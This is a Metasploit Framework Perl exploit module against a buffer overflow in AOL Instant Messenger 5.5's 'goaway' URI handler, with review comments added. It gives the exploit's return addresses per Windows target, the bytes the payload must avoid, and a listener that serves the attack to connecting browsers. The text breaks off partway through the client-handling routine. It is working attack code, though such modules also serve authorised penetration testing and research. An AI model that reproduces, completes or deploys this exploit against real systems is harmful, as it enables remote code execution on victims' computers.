Name: AOL Instant Messenger goaway Overflow 
Version: 1.4 
Targeting: win32, win2000, winxp, win2003 / x86 
Privileges: No 
Authors: 
skape <mmiller [at] hick.org> 
thief <thief [at] uninformed.org> 
 
Targets: 
0 - Automatic 
1 - Windows XP SP0 
 
Options: 
HTTPHOST - The local HTTP listener host 
HTTPPORT - The local HTTP listener port 
 
Payload Info: 
Room for 1014 bytes of payload 
Restricted bytes: 0x00 0x09 0x0a 0x0d 0x20 0x22 0x25 0x26 0x27 0x2b 0x2f 0x3a 0x3c 0x3e 0x3f 0x40  
 
Description: This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying an overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. 
References:   
http://www.osvdb.org/8398 
http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities 
 
exploits:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
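##
# The package statement must start its own line; fused onto the closing
# comment fence it is itself a comment and the module would load into main.
package Msf::Exploit::aim_goaway;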
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
# No advanced options are defined; this empty hash is still handed to the
# Msf::Exploit base constructor as 'Advanced' (see new()).
my $advanced = {};
# Module metadata handed to the Msf::Exploit base constructor as 'Info'
# (see new()).
my $info =
{
	'Name'           => 'AOL Instant Messenger goaway Overflow',
	'Version'        => '$Revision: 1.4 $',
	'Authors'        => 
		[
			'skape <mmiller [at] hick.org>',
			'thief <thief [at] uninformed.org>'
		],
	'Description'    => 
		Pex::Text::Freeform(qq{
			This module exploits a flaw in the handling of AOL Instant
			Messenger's 'goaway' URI handler.  An attacker can execute 
			arbitrary code by supplying a overly sized buffer as the 
			'message' parameter.  This issue is known to affect AOL Instant 
			Messenger 5.5.
		}),
	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'           => 0,
	# User-settable options as [ flag, type, description, default ].
	# NOTE(review): the leading 1/0 looks like a "required" flag - confirm
	# against Msf::Exploit before relying on it.
	'UserOpts'       => 
		{
			'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
			# 0.0.0.0 is the wildcard address, so by default the listener in
			# Exploit() is reachable on every local interface; set HTTPHOST to
			# a single address to keep it off networks that need not reach it.
			'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
		},
	'Payload'        => 
		{
			'Space'    => 1014,
			# Bytes the payload must avoid: NUL, whitespace/line-break
			# characters and URI-reserved/unsafe punctuation.
			'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
			'MaxNops'  => 1014, 
			'Keys'     => [ '-ws2ord' ],
		},
	# Public advisories for this issue; useful for patch/version tracking.
	'Refs'           => 
		[
			[ 'OSVDB', 8398 ],
			'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities',
		],
	'DefaultTarget'  => 0,
	# Each target is [ display name, 32-bit value ]; the trailing comment names
	# the module the value was taken from.  'Automatic' uses a single value for
	# every OS listed above.
	'Targets'        =>
		[
			[ 'Automatic',      0x1108118f ], # proto.ocm
			[ "Windows XP SP0", 0x71aa2461 ], # ws2help.dll
		],
	'Keys'           => [ 'aim' ],
};
# Constructor: passes this module's static metadata ($info, $advanced) to
# the Msf::Exploit base constructor; any further caller arguments are
# forwarded untouched.
sub new
{
	my ($class, @ctor_args) = @_;

	return $class->SUPER::new(
			{
				'Info'     => $info,
				'Advanced' => $advanced,
			},
			@ctor_args);
}
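# Entry point called by the framework: binds a TCP listener on
# HTTPHOST:HTTPPORT and hands every accepted connection to
# HandleHttpClient (defined below).  Returns nothing; on a failed bind it
# reports the error and returns early.
sub Exploit
{
	my ($self) = @_;
	my $host = $self->GetVar('HTTPHOST');
	my $port = $self->GetVar('HTTPPORT');

	# Bind the local HTTP listener; with the default HTTPHOST of 0.0.0.0 this
	# accepts connections on every local interface.
	my $listener = IO::Socket::INET->new(
			LocalHost => $host,
			LocalPort => $port,
			ReuseAddr => 1,
			Listen    => 1,
			Proto     => 'tcp');

	# Include the OS error ($!, e.g. port already in use or insufficient
	# privilege) so a failed bind can be diagnosed, not just noticed.
	if (not defined $listener)
	{
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $port . ": $!");
		return;
	}

	$self->PrintLine("[*] Waiting for connections to http://" . $host . ":" . $port . " ...");

	# Serve connections until accept() itself fails; there is no other exit.
	while (defined(my $peer = $listener->accept()))
	{
		$self->HandleHttpClient(fd => $peer);
	}

	return;
}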
sub HandleHttpClient
{
	my $self = shift;
	my ($fd) = @{{@_}}{qw/fd